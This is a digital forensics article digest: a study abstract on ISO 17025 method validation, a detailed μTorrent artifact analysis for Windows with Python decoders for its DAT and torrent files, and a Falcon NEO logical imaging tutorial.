Channel: Digital Forensics – Forensic Focus – Articles

Requirements In Digital Forensics Method Definition: Observations From A UK Study


by Angus M. Marshall & Richard Paige

Abstract

During a project to examine the potential usefulness of evidence of tool verification as part of method validation for ISO 17025 accreditation, the authors have examined requirements statements in several digital forensic method descriptions and tools. They have identified that there is an absence of clear requirements statements in the methods and a reluctance or inability to disclose requirements on the part of tool producers. This leads to a break in evidence of correctness for both tools and methods, resulting in incomplete validation. They compare the digital forensics situation with other ISO 17025 accredited organisations, both forensic and non-forensic, and propose a means to close the gap and improve validation. They also review existing projects which may assist with their proposed solution.

Read the full paper on ResearchGate.


Forensic Analysis Of The μTorrent Peer-to-Peer Client In Windows


by Michael R. Godfrey

The μTorrent software client is the most popular BitTorrent peer-to-peer software application worldwide [1]. Contraband files such as copyrighted movies and music, child pornography and pirated content are frequently acquired through the peer-to-peer (P2P) file sharing protocol BitTorrent. This research covers the digital forensic analysis of the μTorrent client, specifically the free (Basic) version 3.5.3 for Windows released on utorrent.com. The μTorrent client is based on the same architecture as the original, less popular client, itself named BitTorrent (bittorrent.com); both software applications are owned by BitTorrent, Inc. [2]. Although the same artifacts have been identified in all versions of μTorrent, any examination of other versions should be tested by the examiner.

μTorrent is available for Windows, Mac, Linux, Android, and iOS (only with a jailbroken device). A computer running μTorrent can be paired with external devices for viewing (iOS and Android mobile devices, USB storage drives, and certain streaming devices)[3].

A user can remotely and securely manage μTorrent running on a computer. Their μTorrent client can then be accessed from another computer or mobile device equipped with a web browser [4].

BitTorrent uses trackers to allow clients to find other peers. Rather than downloading a file from a single source (node), the BitTorrent protocol lets users join a swarm of hosts that upload and download content to and from each other. A seed is a peer that possesses the entire file being distributed. A user who wants to distribute a file must first create a small torrent descriptor file that contains only metadata and has a .torrent file extension. The .torrent files are distributed through one or more torrent websites, called indexers, that allow users to search for particular content and download the applicable .torrent files. The .torrent files include specific tracker information. A tracker is a server that keeps track of which peers and seeds have the pieces of the files being distributed. The distributed hash table (DHT) method for “trackerless” torrents makes trackers optional rather than essential: a client can find peers through the DHT even when no tracker is listed or reachable [5].

Users with the .torrent file loaded into their BitTorrent client can establish connections to other BitTorrent nodes (peers or seeds), including via the DHT feature of BitTorrent. The file being distributed is divided into segments (pieces); as soon as a peer receives a piece, it becomes a distributor of that piece. Every piece is protected by a cryptographic hash (SHA-1) stored in the .torrent file, so the client can tell which received pieces are intact and which pieces it still needs in order to obtain a complete file. Once a peer has downloaded the complete file, it becomes a seed.

BitTorrent does not ensure the anonymity of its participants. The IP addresses of connected peers can be readily identified through the client user interface or via the Windows netstat command, which will display the connected peers and seeds. The standard ports for BitTorrent, including the μTorrent client, are TCP/UDP ports 6881-6889 (6969 for the tracker port); the listening port is configurable, however, so confirm the port actually in use from the client’s Preferences > Connection settings rather than assuming the default range.

The μTorrent Client

The default installation will place all files for the μTorrent client in the user’s application data directory as follows:
C:\Users\<User_Name>\AppData\Roaming\uTorrent\

The following configuration files include relevant information regarding application setting and history:

  • resume.dat
  • settings.dat
  • dht.dat (distributed hash table)
  • rss.dat

If the client is shut down, the above DAT files are backed up and .old is appended as the new file extension. The below graphics are of the μTorrent directory following a fresh installation in Windows 10: on the left, after installation but before launching the application; on the right, after the first launch of μTorrent, adding TEST.torrent to the client, and shutting it down.

BEncode Editor

The DAT files and .torrent files are written in BEncode. Therefore, to view the contents, a tool capable of decoding BEncode files must be used, such as BEncode Editor.

When viewing these files in the BEncode Editor, data will appear with an indicator showing the data type adjacent to each heading:

  • Byte strings: (b)
  • Integers: (i) (base 10 ASCII characters)
  • Lists: (l)
  • Dictionaries: (d)

A number in square brackets after the type indicator, e.g. [48], gives a count whose meaning depends on the data type (byte string, integer, list or dictionary):

  • Byte strings: number of bytes or characters
  • Integers: number of digits
  • Lists and Dictionaries: number of items in the list or dictionary

Below is the contents of a settings.dat file viewed with BEncode Editor.
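The same decoding can be done without BEncode Editor. The following Python, added here as an example and not taken from the article or from μTorrent, decodes a constructed settings.dat-style blob (the born_on value is the one quoted below; the paths and other values are made up), prints the type tag and bracketed count the way BEncode Editor would, and converts the born_on (seconds since 1601) and settings_saved_systime (Unix) timestamps to UTC.

```python
import datetime

# Seconds between 1601-01-01 (FILETIME epoch) and 1970-01-01 (Unix epoch), both UTC.
EPOCH_1601_TO_1970 = 11644473600


def bdecode(data: bytes, pos: int = 0):
    """Decode one bencoded value starting at data[pos]; return (value, next_pos).

    Integers come back as int, byte strings as bytes, lists as list and
    dictionaries as dict keyed by bytes, mirroring the (i)/(b)/(l)/(d) tags
    that BEncode Editor shows.
    """
    c = data[pos:pos + 1]
    if c == b"i":                                  # i<base-10 digits>e
        end = data.index(b"e", pos)
        return int(data[pos + 1:end]), end + 1
    if c == b"l":                                  # l<value>...e
        pos += 1
        items = []
        while data[pos:pos + 1] != b"e":
            item, pos = bdecode(data, pos)
            items.append(item)
        return items, pos + 1
    if c == b"d":                                  # d<key><value>...e, keys are byte strings
        pos += 1
        out = {}
        while data[pos:pos + 1] != b"e":
            key, pos = bdecode(data, pos)
            out[key], pos = bdecode(data, pos)
        return out, pos + 1
    if c.isdigit():                                # <length>:<raw bytes>
        colon = data.index(b":", pos)
        length = int(data[pos:colon])
        start = colon + 1
        return data[start:start + length], start + length
    raise ValueError(f"unexpected byte {c!r} at offset {pos}")


def editor_label(value) -> str:
    """Type tag and bracketed count in the form BEncode Editor displays them."""
    if isinstance(value, bytes):
        return f"(b)[{len(value)}]"                # number of bytes
    if isinstance(value, int):
        return f"(i)[{len(str(abs(value)))}]"      # number of decimal digits
    if isinstance(value, list):
        return f"(l)[{len(value)}]"                # number of items
    return f"(d)[{len(value)}]"                    # number of key/value pairs


def born_on_to_utc(born_on: int) -> datetime.datetime:
    """born_on counts seconds since 1601-01-01 UTC (a FILETIME with the 100 ns units dropped)."""
    return datetime.datetime.fromtimestamp(born_on - EPOCH_1601_TO_1970, datetime.timezone.utc)


def unix_to_utc(ts: int) -> datetime.datetime:
    return datetime.datetime.fromtimestamp(ts, datetime.timezone.utc)


# Constructed sample standing in for a trimmed settings.dat. The born_on value is the one
# quoted in the article; the paths and remaining values are made up for this example.
SAMPLE_SETTINGS = (
    b"d"
    b"7:born_oni13036184115e"
    b"7:ct_histl18:C:\\share\\movie.mkve"
    b"8:dir_last12:D:\\Downloads"
    b"15:runs_since_borni42e"
    b"22:settings_saved_systimei1519999701e"
    b"e"
)


def summarize_settings(raw: bytes) -> dict:
    """Decode a settings.dat blob and pull out the entries the article calls most useful."""
    settings, end = bdecode(raw)
    if end != len(raw):
        raise ValueError("trailing bytes after the top-level dictionary")
    text = lambda b: b.decode("utf-8", "replace")
    return {
        "labels": {text(k): editor_label(v) for k, v in settings.items()},
        "installed_utc": born_on_to_utc(settings[b"born_on"]).isoformat(),
        "torrents_created": [text(p) for p in settings[b"ct_hist"]],
        "last_save_dir": text(settings[b"dir_last"]),
        "runs_since_install": settings[b"runs_since_born"],
        "settings_saved_utc": unix_to_utc(settings[b"settings_saved_systime"]).isoformat(),
    }


if __name__ == "__main__":
    for key, value in summarize_settings(SAMPLE_SETTINGS).items():
        print(f"{key}: {value}")
```

To run this against a real file, read it with `open(path, "rb").read()` in place of SAMPLE_SETTINGS; the trailing-bytes check will flag a truncated or corrupted DAT file, and the .old backup can be decoded the same way for comparison.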

μTorrent DAT Files

settings.dat

Contains settings and configuration data

  • autostart=: 0=OFF, otherwise there will be no entry
  • ct_hist [#]: Number of .torrent files created by this client (within brackets), includes path and name of files/folders that the user used to create the .torrent file; good indicator of knowledge and intent; may point to external media or other storage drive/directory locations
  • born_on=13036184115: Install time, stored as whole seconds since 1 Jan 1601 UTC (a Windows FILETIME, i.e. a count of 100-nanosecond intervals, with the last seven digits dropped). Convert by subtracting 11644473600 to obtain Unix time (13036184115 − 11644473600 = 1391710515, i.e. 2014-02-06 18:15:15 UTC), or append seven trailing zeroes and enter the result as a FILETIME/LDAP value in EpochConverter
  • devices: Paired devices will be listed here with device name, USB VID&PID and serial number
    • auto_transfer=: 0=OFF/1=ON
    • usb_id: contains the USB device vendor ID (VID) and product ID (PID), along with USB device electronic serial number and possibly the device friendly name

The graphic below shows the μTorrent Devices interface with two devices connected: iPhone/iPod and Apple iPhone 3GS.

dir_last entry is the directory selected by the user to download a Torrent file when the user added the associated .torrent file and selecting the “choose save dir” option (see below graphic). The dir_last entry is updated for each new .torrent file added in this manner.

  • *dir_active_download: Location set by user to save new downloads
  • *dir_autoload: Location set by user to autoload Torrent files
  • *dir_completed_download: Location set by user to store completed downloads
  • *dir_completed_torrents: Location set by user to archive completed .torrent files
  • *dir_torrent_files: Location set by user to store torrent files downloaded by the client

(*) The above settings will be present only if the user changed the default location for that particular directory using the Preferences menu (see below image), otherwise no entry will be present.

  • runs_since_born: Number of times the program started and closed since install
  • runtime_since_born_secs: Number of seconds the program has run
  • search_list: List of Torrent search sites used in the μTorrent toolbar, can be added by the user, results in user’s web browser loading the search site so check Internet History
  • settings_saved_systime: Last time client settings were changed, UNIX time

Remote Access

A system configured for Remote Access will allow a user to control the uTorrent client running on the remote system using a web interface. To initiate Remote Access, the user will navigate to https://remote.utorrent.com and enter the previously configured computer name and password. After authenticating, the user is presented with a web interface that appears nearly identical to the uTorrent client status on the remote system. The below image depicts the Remote Access web interface (top) and the actual uTorrent client (bottom).

Below are the more relevant entries in settings.dat that will be present if the client is set to be operated via
Remote Access connection using the Preferences > Remote menu settings. A unique name must be provided and
any password will be accepted. The below image shows the Remote Access setting enabled:

  • upnp.external_ip: Last external (routable) IP of the computer the client is installed on; see image below
  • upnp_cached_host: Universal Plug and Play (UPnP) URL of the IGDdevicedesc.xml file on the local network; will include the local network gateway IP and port; used to facilitate network connectivity
  • webui.ssdp_uuid: Universally unique identifier; if it is a version 1 (time-based) UUID, its last 12 hex digits (6 bytes) are the MAC address of the network interface used when it was generated
  • webui.ucinnect_hashword: Salted SHA-1 hash of the login password for Remote Access
  • webui.ucinnect_username: Name of the computer assigned by the user in Preferences > Remote

resume.dat

Stores status info when client is shut down

  • added_on=: Time Torrent was added to the client (UNIX time)
  • completed_on=: Time Torrent was completely downloaded or created (UNIX time)
  • created_torrent=: 1=client created torrent, 0=client did not create torrent
  • download_url=: If client used ‘add torrent from URL’ function
  • downloaded=: Bytes of the file downloaded so far
  • last_seen_complete=: Last time client was seeding the complete file (UNIX time)
  • last_active=: Last time the file was being seeded or shared by this client (UNIX time)
  • path (b)[n]=: Path where this torrent’s content is saved; n is the length of the path string in bytes
  • runtime=: Time file has been downloading in the client (or seeding time following download)
  • seedtime=: Seconds that client has been seeding file
  • started=: File status when client last exited (0=stopped, 1=force started, 2=started, 3=running/not downloading)
  • uploaded=: Total uploaded (shared) bytes of data for that specific file
  • peers6 (b)[n]=: IP addresses and ports of the peers sharing this file at the time the client exited (includes the client’s own local and external IP; IPv4 peers are stored as IPv4-mapped IPv6 addresses). Each peer occupies 18 bytes, so n/18 is the peer count; see below for the procedure to decode the data and identify the IP addresses.

Use the following procedure to view the IP address and port of each peer:

o The peers6 field of the resume.dat file contains the addresses of each peer the client was communicating with in order to participate in the sharing of content via the BitTorrent protocol.
o In the peers6 field of the resume.dat file, select display options “Raw BEncoded Data” and “as Binary.”
o Each peer is one 18-byte record: a 16-byte IPv6 address followed by a 2-byte port. An IPv4 peer is stored as an IPv4-mapped IPv6 address (::ffff:a.b.c.d), i.e. ten zero bytes, then FF FF, then the four IPv4 bytes.
o Convert the four IPv4 bytes from hex to decimal to get the IP.
o The last 4 hex characters are the port. In the author’s test the port decoded correctly when read little-endian (bytes swapped relative to the big-endian order used on the wire), so check the decoded value against a known port (for example the client’s own listening port in Preferences > Connection) before relying on either reading.

Open the data field adjacent to the peers6 entry:

Copy and paste this hex data into Notepad++ and break it into lines of 36 characters (one 18-byte record per line). Each line shows the 32-character IPv6 address followed by the 4-character port; for an IPv4 peer the address part is 20 zeroes, FFFF, and the 8-character IPv4 address:

Byte string (36 characters): 00000000000000000000FFFFC0A80177B0E3

IPv4-mapped prefix: 00000000000000000000FFFF
IPv4 address (convert each byte from hex to decimal): C0A80177

C0=192
A8=168
01=1
77=119

Port bytes: B0E3; read little-endian (E3B0) = 58,288, read big-endian = 45,283
Converted (little-endian port, as the author decoded it): 192.168.1.119:58288

dht.dat

Contains data used by the client when connecting to the Distributed Hash Table (DHT) network for sharing contact information, so users engaged in downloading the same file(s) can discover each other. This file also stores the client’s outwardly facing IP address. This is a useful artifact, as most Windows artifacts only store the local, non-routable IP address. Be sure to review dht.dat.old as well: it is the previous version of the file from the last shutdown of the μTorrent client for this user.

age: Time last updated, or when client shut down (UNIX decimal), good indicator of associating the client’s IP to a date/time.
ip: Represents the client’s routable IP address in hex (assigned by the client’s service provider), follow the below steps to translate the data to identify the outwardly facing client IP.

Double click the text data to the right (below example: G>#!):

Select display options: “Raw BEncoded Data” and “as Binary”:

Convert hex to decimal:

47=71
3E=62
23=35
21=33

Converted IP: 71.62.35.33

In the above test example, visiting the website www.whatismyipaddress.com disclosed the correctly translated IP address, rather than just the local IP, of the test Windows computer system.

nodes: Contains the DHT contacts (node ID, IP address and port) of each node the client was communicating with in order to participate in the sharing of content via the BitTorrent protocol. Each contact is a fixed-length record; to convert the data, follow the steps below.

  • 26-byte records (52 hex digits): 20-byte node ID, 4-byte IPv4 address, 2-byte port. An IPv6 contact needs a 16-byte address and cannot fit a 26-byte record, so these entries are IPv4.

To determine the total number of nodes the client was communicating with, divide the number in brackets (10036, in the example below) by 26 (bytes per record) to determine the total number of IP addresses contained in the data (386 IPs in the example below); display Type “Binary / as Binary” as depicted below.

  • id (b)[20]=: Contains the unique ID of the client’s own DHT node, 20 bytes shown as 20 hex character pairs. To display the data, select: “Raw BEncoded Data” and “as Binary”:
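The manual hex-to-decimal steps above (peers6 in resume.dat, and ip and nodes in dht.dat) can be scripted. The following Python is an added example, not code from the article or from μTorrent; the first peers6 record and the dht.dat ip bytes are the values shown above, while the second peer record and both DHT nodes are constructed. The port byte order for peers6 defaults to the little-endian reading that matched the author’s test and can be switched to big-endian; for nodes the block assumes the big-endian port of the standard DHT compact node format, which should likewise be checked against a known node.

```python
import ipaddress
import struct


def split_records(blob: bytes, size: int) -> list:
    """Split a raw BEncode byte string into fixed-size records, refusing odd leftovers."""
    if len(blob) % size:
        raise ValueError(f"{len(blob)} bytes is not a multiple of {size}")
    return [blob[i:i + size] for i in range(0, len(blob), size)]


def decode_peers6(blob: bytes, port_little_endian: bool = True) -> list:
    """resume.dat 'peers6': 18-byte records = 16-byte IPv6 address + 2-byte port.

    IPv4 peers are stored as IPv4-mapped IPv6 addresses (::ffff:a.b.c.d), which is
    why such records start with ten zero bytes and FF FF. The port defaults to the
    little-endian reading that matched the article's test client; pass False to read
    it in network (big-endian) order. Compare against a known port before trusting either.
    """
    fmt = "<H" if port_little_endian else ">H"
    peers = []
    for rec in split_records(blob, 18):
        addr = ipaddress.IPv6Address(rec[:16])
        (port,) = struct.unpack(fmt, rec[16:18])
        peers.append((str(addr.ipv4_mapped or addr), port))
    return peers


def decode_dht_ip(blob: bytes) -> str:
    """dht.dat 'ip': the client's routable IPv4 address as 4 raw bytes."""
    return str(ipaddress.IPv4Address(blob))


def decode_dht_nodes(blob: bytes) -> list:
    """dht.dat 'nodes': 26-byte records = 20-byte node ID + 4-byte IPv4 + 2-byte port.

    Assumption: the port is big-endian as in the DHT compact node format.
    """
    nodes = []
    for rec in split_records(blob, 26):
        node_id = rec[:20].hex()
        ip = str(ipaddress.IPv4Address(rec[20:24]))
        (port,) = struct.unpack(">H", rec[24:26])
        nodes.append((node_id, ip, port))
    return nodes


# Sample data. The first peers6 record and the dht 'ip' bytes are the values shown in
# the article; the second peer record and both DHT nodes are constructed for this example.
PEERS6_HEX = (
    "00000000000000000000FFFFC0A80177B0E3"          # ::ffff:192.168.1.119, port bytes B0 E3
    "20010DB8000000000000000000000001" "E11A"       # 2001:db8::1, port bytes E1 1A
)
DHT_IP_HEX = "473E2321"                                # 71.62.35.33
DHT_NODES_HEX = (
    "00" * 20 + "0A000002" + "1AE1"                    # node ID all 00, 10.0.0.2:6881
    + "FF" * 20 + "C6336401" + "1B39"                  # node ID all FF, 198.51.100.1:6969
)


def summarize_dht_and_peers(peers6_hex: str, dht_ip_hex: str, nodes_hex: str) -> dict:
    """Decode the three fields as pasted from BEncode Editor's raw/binary view."""
    nodes = decode_dht_nodes(bytes.fromhex(nodes_hex))
    return {
        "client_external_ip": decode_dht_ip(bytes.fromhex(dht_ip_hex)),
        "peers": decode_peers6(bytes.fromhex(peers6_hex)),
        "node_count": len(nodes),                      # same as len(blob) // 26
        "nodes": nodes,
    }


if __name__ == "__main__":
    for key, value in summarize_dht_and_peers(PEERS6_HEX, DHT_IP_HEX, DHT_NODES_HEX).items():
        print(f"{key}: {value}")
```

Feeding the bytes straight from the decoded DAT file (rather than hex copied from the editor) avoids transcription slips; the length check in split_records catches a partial paste.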

Torrent files

To distribute files using the BitTorrent protocol, a .torrent file will need to be created and seeded. In the client, .torrent files can be created using the following procedure.

  • In μTorrent, select FILE –> Create Torrent

  • Select either a single file, or the contents of a directory containing the files that will be associated with the torrent file
  • Add or change the torrent tracker URL information
  • Add any comments regarding the torrent contents as desired
  • Check Start seeding
  • Select Create
  • Provide a name for the torrent file, and be sure the file type is Torrent files:

A BEncode viewer (BEncode Editor) is necessary to view the content of a .torrent file.

  • announce: URL of the tracker site
  • announce-list: An extension key (BEP 12) that contains a list of tracker URL tiers for this torrent:

o Tiers of announces will be processed sequentially
o All URLs in each tier must be checked before the client goes on to the next tier
o The first successful connection with a tracker will cause it to be moved to the front of the tier

  • info: Describes the content. A multi-file torrent has a files list with an entry for each file; a single-file torrent instead carries its length directly under info:
    • ITEM 1 (d)[n]: One file, numbered by its position in the files list, with the number in brackets giving the number of keys in this entry (2: length and path)
    • length (i)=: Number of bytes of the file
    • path (l)[n]: Path of the file relative to the torrent name, as a list of path components (n = number of components)
    • name (b)[n]=: Name of the torrent, i.e. the top-level directory or file name (not to be confused with the name of the .torrent file itself)
    • piece length (i)=: The number of bytes in each piece that the content was split into; a power of two that μTorrent chooses from the total size unless the user picks one in the Create Torrent dialog. The number of pieces is the total content size divided by the piece length, rounded up
    • pieces (b)[n]: The 20-byte SHA-1 digests of all pieces concatenated, so n = 20 × number of pieces

The below graphic explains the contents of the info section of a torrent file. Each file is combined into one stream, then split into fixed piece lengths for efficient transfer using the BitTorrent protocol.

Once a .torrent file has been generated, the content must be seeded and the .torrent file made available (for example on an indexer site) so that others can locate it by keyword search and download it. The below image displays the Info tab of TEST.torrent showing that there is one member of the swarm with one peer connected (both are the test client), and that the content is divided into 33 pieces, each 1 MB in size. TEST.torrent was created by μTorrent v3.5.3 at 14:15:01, 2 Mar 18.
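The relationship between the info section and the content (one concatenated stream, fixed-size pieces, one SHA-1 per piece, pieces that straddle file boundaries) is what lets an examiner check recovered files against a seized .torrent. The following Python is an added example, not the article’s or μTorrent’s code: it builds the pieces string the way a creating client would for a constructed two-file torrent with a deliberately tiny 16-byte piece length, then verifies a copy with one corrupted byte and reports which pieces fail and which files those pieces cover.

```python
import hashlib
import math


def concatenate(files: list) -> bytes:
    """Join file contents in info['files'] order into the single stream that is hashed."""
    return b"".join(data for _, data in files)


def build_pieces(stream: bytes, piece_length: int) -> bytes:
    """What the creating client stores under info['pieces']: SHA-1 of each piece, concatenated."""
    return b"".join(
        hashlib.sha1(stream[i:i + piece_length]).digest()
        for i in range(0, len(stream), piece_length)
    )


def piece_count(total_bytes: int, piece_length: int) -> int:
    """Total content size divided by piece length, rounded up (the last piece may be short)."""
    return math.ceil(total_bytes / piece_length)


def verify_pieces(stream: bytes, piece_length: int, pieces: bytes) -> list:
    """One True/False per piece: does the recovered data hash to the stored digest?"""
    if len(pieces) % 20:
        raise ValueError("pieces is not a multiple of 20 bytes")
    expected = [pieces[i:i + 20] for i in range(0, len(pieces), 20)]
    n = piece_count(len(stream), piece_length)
    if n != len(expected):
        raise ValueError(f"stream needs {n} pieces but the torrent lists {len(expected)}")
    return [
        hashlib.sha1(stream[k * piece_length:(k + 1) * piece_length]).digest() == expected[k]
        for k in range(n)
    ]


def files_in_piece(index: int, piece_length: int, lengths: list) -> list:
    """Indexes (info['files'] order) of the files that piece `index` overlaps."""
    start, end = index * piece_length, (index + 1) * piece_length
    hits, offset = [], 0
    for i, length in enumerate(lengths):
        if offset < end and offset + length > start:
            hits.append(i)
        offset += length
    return hits


# Constructed two-file torrent. A 16-byte piece length keeps the example tiny; real
# clients use powers of two from 16 KiB upwards.
PIECE_LENGTH = 16
ORIGINAL = [("docs/a.txt", b"A" * 20), ("docs/b.bin", b"B" * 30)]


def demo() -> dict:
    stream = concatenate(ORIGINAL)
    pieces = build_pieces(stream, PIECE_LENGTH)          # what the .torrent would carry
    damaged = bytearray(stream)
    damaged[25] ^= 0xFF                                   # flip one byte: b.bin offset 5
    lengths = [len(data) for _, data in ORIGINAL]
    results = verify_pieces(bytes(damaged), PIECE_LENGTH, pieces)
    bad = [k for k, ok in enumerate(results) if not ok]
    return {
        "piece_count": piece_count(len(stream), PIECE_LENGTH),
        "pieces_bytes": len(pieces),
        "results": results,
        "bad_pieces": bad,
        "files_touched": {k: files_in_piece(k, PIECE_LENGTH, lengths) for k in bad},
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

A piece that fails does not by itself say which file is wrong: piece 1 here covers the end of a.txt and the start of b.bin, so both files have to be examined. With a real .torrent, take piece length and pieces from the decoded info dictionary and the file order from its files list.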

μTorrent statistics

In μTorrent, select Help –> Show Statistics

The entire μTorrent directory from the suspect’s system can be exported and installed in a test VM running the same OS in order to emulate (view) the suspect’s μTorrent state at the time of last shutdown:

Install the same version of μTorrent on the destination system first (look for the .exe file in the updates folder for the version installed). Note that this ‘emulation’ will increment the statistics to include your testing (e.g., program launch count +1), so use VM snapshots and restore as needed.

μTorrent Search Tool

In μTorrent, users can search for content and torrent file indexer site results will display. The search activity will be captured in Web History as it uses the default browser to run the searches.

μTorrent Windows Registry Artifacts

The following Windows Registry entries are associated with the installation and use of μTorrent:
ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Uninstall\uTorrent

ntuser.dat\Software\BitTorrent\uTorrent

ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.torrent\OpenWithList

  • Will show which BitTorrent client type was preferred if multiple clients have been installed (and when)
  • Value = letter representing the order of assigned programs

ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.torrent
– Shows recent Torrent files accessed

ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU\torrent
– Shows Torrent files opened or saved via the Windows dialog shell

usrclass.dat\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
– When an application is executed, Windows retrieves the application name and stores it here
– Shows applications that have been executed

Using Notepad++

Notepad++ can be used to assist in translating the raw data retrieved from the encoded data stored in the DAT files or torrent files.

To force a string into new lines after every nth character:

  • Copy and paste data to Notepad++
  • Remove any leading ‘x0’ prefix from the byte string data
  • Select CTRL+H to enter the find and replace menu
  • Enter: ^.{n} in ‘Find what’
  • Enter: $0\r\n in ‘Replace with’
  • Replace the {n} with the number of characters before each line (in the below example, {20} is used)
    o Use 36 for peers6 (resume.dat) – IP/Port
    o Use 52 for nodes (dht.dat) – Node ID/IP/Port
    o Use 40 for pieces (.torrent files) – one 20-byte SHA-1 digest (40 hex characters) per line
  • Select Regular expression
  • Results can then be copied to Excel

About The Author

Michael Godfrey is a Senior Digital Forensics Examiner for ManTech International and was previously a Special Agent for Homeland Security Investigations assigned to the DHS Cyber Crimes Center in Fairfax VA. 

[1] Alan Henry, Most Popular BitTorrent Client: μTorrent, Lifehacker, May 2015. https://lifehacker.com/5813348/five-best-bittorrent-applications/1705622513
[2] Ernesto, BitTorrent Inc Buys uTorrent, TorrentFreak, Dec 2006. https://torrentfreak.com/bittorrent-inc-buys-%C2%B5torrent/
[3] Lauren Hockenson, μTorrent Pro Tips: How to Pair Your Android Device, μTorrent blog, Feb 2015. http://blog.utorrent.com/2015/02/20/%CE%BCtorrent-pro-tips-how-to-pair-your-android-device
[4] μTorrent Remote. https://www.utorrent.com/remote
[5] Ben Jones, TorrentFreak, Oct 2009. https://torrentfreak.com/common-bittorrent-dht-myths-091024

How To: Create A Logical Image On Falcon NEO


Welcome to Logicube’s tutorial on the Forensic Falcon NEO. In this episode, we’ll show you how to perform a logical image.

The logical imaging feature of Falcon NEO shortens the evidence collection process by allowing investigators to select and acquire only the specific files they need, rather than the entire physical drive. Users can create logical images from source drives locally attached to the Falcon NEO, or from a network repository.

To perform a logical image, we’ll choose the Mode icon and select ‘File to File’. Choose the source drive – we’ll choose S1 – and then choose the Settings icon. Under the Settings icon you can add case information by clicking on the Case Info icon. So you can add a case filename, case ID, examiner, case notes, whatever you like.

Then we’re going to select the Root Directory icon. In this screen, the top-level directory can be set. All searches will start from this directory. The root directory can be entered manually, or you can browse the selected source drive by clicking on the Folder icon. And here you can see that there are two partitions in this source drive; we’re going to go ahead and select the one named ‘Partition 2’. And you can scroll through the contents by using the slider on the right-hand side. We’re going to go ahead and select ‘Demo Folder’, click ‘OK’.

Next we’re going to select the output format. Here your choices are a directory tree format, so the results will be written in a directory tree format and all files will appear in the same directory structure as found on the source drive. An L01 or LX01 Archive, which is a logical evidence file format that can be used with a variety of forensic software tools; a zip archive; or an MFT report. In this case all results will list deleted files, if they’re present, that can potentially be restored or recovered.

We’re going to select ‘Directory Tree.’ Next we’ll move on to the filter settings. There are three choices: a Path Filter, Signature-Based File Categories, and/or Keywords. We’re going to start with Path Filter, and you’ll see there are two options: Preset and Custom Filter. Under Preset you’ll see there are things like ‘Include all user directories’, ‘exclude all program directories’; all of these are set to ‘no’ as default and we’re going to keep that default.

We move on to the custom filter. The Falcon NEO uses POSIX extended regular expressions for the syntax of the filter. A regular expression is simply a special text string for describing a search pattern. More information regarding POSIX regular expressions can be found in the Falcon NEO user’s manual.

If we wanted to filter file names to a single keyword, we could enter period, asterisk, parentheses, and the word we wanted to search on, and close parentheses. In this case I’ve used the word ‘taliban’ so that it will search for any file names that include the word ‘taliban’. So taliban.jpg, taliban.txt, taliban.png. You could have multiple keywords by separating each keyword with a straight line within the parentheses, so for example I could add a straight line here and then add another word, for example ‘b-o-m-b’, and so now the custom filter will show any file name that included ‘taliban’ or ‘bomb’; bomb.png for example, it would search for that.

For this exercise, what I want to do is to search for file extensions, so for this type of filter we need to add a backslash followed by a period to the syntax: a bare period matches any single character, while ‘\.’ matches a literal dot. So we’re going to go ahead and add a backslash here, then a period, and in this case I’m going to add the extension ‘pdf’, so for this search we’re going to look for any file names that contain ‘.pdf’. Click OK.
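As an added example (not part of Logicube’s tutorial), the following Python runs the two filter expressions above against a constructed list of paths, using Python’s re module to stand in for the Falcon NEO’s POSIX ERE engine (these particular patterns mean the same thing in both). It also shows why an unanchored ‘\.pdf’ matches more than PDF files, and what anchoring with ‘$’ or ignoring case changes. The paths are made up.

```python
import re

# Constructed path listing standing in for the source drive; not from the video.
SAMPLE_PATHS = [
    "Demo/Documents/taliban.pdf",
    "Demo/Documents/bomb.png",
    "Demo/Documents/Report.PDF",
    "Demo/Photos/holiday.jpg",
    "Demo/Downloads/invoice.pdf.exe",
]


def path_filter(paths, pattern: str, ignore_case: bool = False) -> list:
    """Keep the paths that match an unanchored extended regular expression.

    re.search (not re.match) is used so the pattern may hit anywhere in the path,
    which is how a leading '.*' behaves in a POSIX ERE filter.
    """
    flags = re.IGNORECASE if ignore_case else 0
    rx = re.compile(pattern, flags)
    return [p for p in paths if rx.search(p)]


FILTERS = [
    (r".*(taliban|bomb)", False),   # keyword filter from the tutorial
    (r"\.pdf", False),              # extension filter from the tutorial (unanchored)
    (r"\.pdf$", False),             # anchored: only names that END in .pdf
    (r"\.pdf$", True),              # anchored and case-insensitive
]

if __name__ == "__main__":
    for pattern, icase in FILTERS:
        hits = path_filter(SAMPLE_PATHS, pattern, icase)
        print(f"{pattern!r:16} ignore_case={icase!s:5} -> {hits}")
```

The unanchored ‘\.pdf’ also returns invoice.pdf.exe, which is the kind of hit a filter set purely on extension will include (or, with a narrower pattern, silently exclude); decide deliberately which you want before the acquisition runs.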

Next we’re going to choose the signature-based file categories. Here you can choose documents, audio, images, video, or archives. In this case we’re just going to look for documents.

And the next method of filtering is keywords. Here you can set specific keywords to search for within the results of the first two filters. Note that the keyword is searched within the content of a file, not on the name of the file. We’re also going to ignore the case, so it will ignore whether it is upper case or lower case, and we’re going to add the word ‘falcon’ as a keyword that we want to search on.

Each filter narrows down the results from the previous filter. Setting a custom path filter, all files with the extension ‘pdf’, then select ‘Documents’ as the signature-based file category, [this] will narrow down the results of the path filter to only document files with the extension .pdf, if you add a keyword such as ‘falcon’ under Keyword Filtering it will narrow the search to documents with a file extension .pdf and whose contents contain the keyword ‘falcon’. Setting the filter too narrowly may adversely affect your results.

Next you can select the hash verification method. In this case we’re going to choose SHA-1, and verify is ‘Yes’. Click ‘OK’, we’ll then select the destination; in this case we’re going to select D3. Once you have all of your settings done and you’ve selected your source and your image file, just press ‘Start’. You’ll get a prompt, click ‘Yes’, and as you can see there’s a progress bar that will appear and it will show you the number of files that were captured, the speed, etc.

If we move to the logs and view the log file for this capture, you’re going to see under the operation parameters the search root path is ‘demo’, the format was ‘directory tree’, the path format was ‘.pdf’, we’re searching under ‘Documents’ and with a keyword ‘falcon’. OK.

And if you’ll scroll down, you’ll see the results of the logical image and it will show you there are four files that were found, we’ll see the hash as well and all of these documents are PDF, and all of them included the word ‘falcon’ in their content. You can close that out.

